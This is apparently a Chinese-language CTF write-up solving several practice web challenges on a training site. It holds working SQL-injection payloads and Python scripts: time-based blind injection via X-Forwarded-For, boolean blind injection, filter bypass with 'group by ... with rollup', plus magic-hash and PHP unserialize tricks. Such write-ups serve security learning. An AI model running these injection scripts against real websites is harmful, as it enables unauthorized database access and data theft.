登录一下好吗 ->运算符叫做“指向结构体成员运算符”,是C语言和C++语言的一个运算符,用处是使用一个指向结构体或对象的指针访问其内成员。 登录 用户名-> ‘=’ 密码-> ‘=’ 那么正常执行的SQL语句就是 select * from 表 where username = “$_POST[‘userneme’]” and password = “$_POST[‘password’]”; 那我们登录执行的SQL语句 select * from 表 where username = “‘‘=’’” and password = “‘‘=’’”; “‘‘=’’”始终成立,NULL=NULL,就相当于 select * from 表 where 1 and 1;
who are you? 时间盲注,在X-forwarded-for参数中。 主要还是SQL语句的理解: ‘+”+”(select case when (substring((select flag from flag ) from %d for 1 )=’%s’) then sleep(5) else 1 end ) and ‘1’=’1 单引号闭合,后面都是条件子句, case when then else end substring () from for
#!/usr/bin/env python # -*- coding: UTF-8 -*- '''Risk2S''' #引用 模块包 import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.lowercase+string.uppercase+string.digits+string.punctuation database=[] flag = "" for i in range(1,33): for str in guess: headers={"x-forwarded-for":"xx'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)} try: res=requests.get(url,headers=headers,timeout=4) except requests.exceptions.ReadTimeout, e: flag = flag + str print "flag:", flag break print 'result:' + flag天网管理系统 源码,提示:<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --> 科学计数法:0exxx就是0 MD5值,0e开头:
s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020
进入/user.php?fame=hjkleffifer 提示$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') { print_r($flag); } 伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年 serialize函数 序列化 本地php构造
<?php $array1 = array('user' => true,'pass'=>true); print_r(serialize($array1)) ?>得到“a:2:{s:4:”user”;b:1;s:4:”pass”;b:1;}” 完工:ctf{dwduwkhduw5465}
因缺思汀的绕过 源码,提示:<!--source: source.txt--> 源码
<?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" type="text"/>'."<br/>"; echo '<input name="pwd" type="text"/>'."<br/>"; echo '<input type="submit" />'."<br/>"; echo '</form>'."<br/>"; echo '<!--source: source.txt-->'."<br/>"; die; } function AttackFilter($StrKey,$StrValue,$ArrReq){ if (is_array($StrValue)){ $StrValue=implode($StrValue); } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ print "水可载舟,亦可赛艇!"; exit(); } } $filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)"; foreach($_POST as $key=>$value){ AttackFilter($key,$value,$filter); } $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); if (!$con){ die('Could not connect: ' . mysql_error()); } $db="XXXXXX"; mysql_select_db($db, $con); $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'"; $query = mysql_query($sql); if (mysql_num_rows($query) == 1) { $key = mysql_fetch_array($query); if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "亦可赛艇!"; } }else{ print "一颗赛艇!"; } mysql_close($con); ?>有两个if嵌套
(mysql_num_rows($query) == 1) ($key['pwd'] == $_POST['pwd'])那就绕过呗!返回行数为1,那就limit 1 pwd我们不知道 利用
group by 列名 with rollup ……offset 数字 数字只能挨个试,最后一个即可。
’or 1 group by pwd with rollup limit 1 offset 2#CTF{with_rollup_interesting} python:
#!/usr/bin/env python # -*- coding: UTF-8 -*- '''Risk2S''' #引用 模块包 # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/pcat/index.php" #(!isset($_POST['uname']) || !isset($_POST['pwd'])) payload = {'uname':"'or 1 group by pwd with rollup limit 1 offset 2#",'pwd':""} # print payload['uname'].decode("utf-8") res = requests.post(url,data=payload) print res.text虽然pwd为空,传参也必须加入字典。
简单的sql注入之3
#!/usr/bin/env python # -*- coding: UTF-8 -*- '''Risk2S''' import requests import string string = string.digits+string.ascii_lowercase #爆破的基础字符 flag = [] FLAG = False def POC(x,i): url = 'http://ctf5.shiyanbar.com/web/index_3.php?id=' poc = "1'and+ascii(substr((select+flag+from+flag)%,%d%,1))%=%d%#" % (x, i) res = requests.get(url+poc) #print('testing url:' + url + poc) # test... if res.headers['Content-Length'] == '471': return 1 else: return 0 for x in range(1, 35): for i in range(32, 129): # ascii码可见字符32-127 if POC(x, i): flag.append(chr(i)) # chr()将整数转为对应的ascii码字符 break elif i == 128: # 当该位flag没有匹配的字符时退出循环 FLAG = True if FLAG: break # 以字符串的形式输出结果 get_flag = '' for i in flag: get_flag += i print get_flagpayload就是 1’and+ascii(substr((select+flag+from+flag)%,%d%,1))%=%d%# 1’and+ascii(substr((select+flag+from+flag),%d,1))=%d#(x,i) 判断第一到第35个字符的ascii码分别是32-127中的哪一个,再转换成字符输出到flag flag{Y0u_@r3_5O_dAmn_90Od}
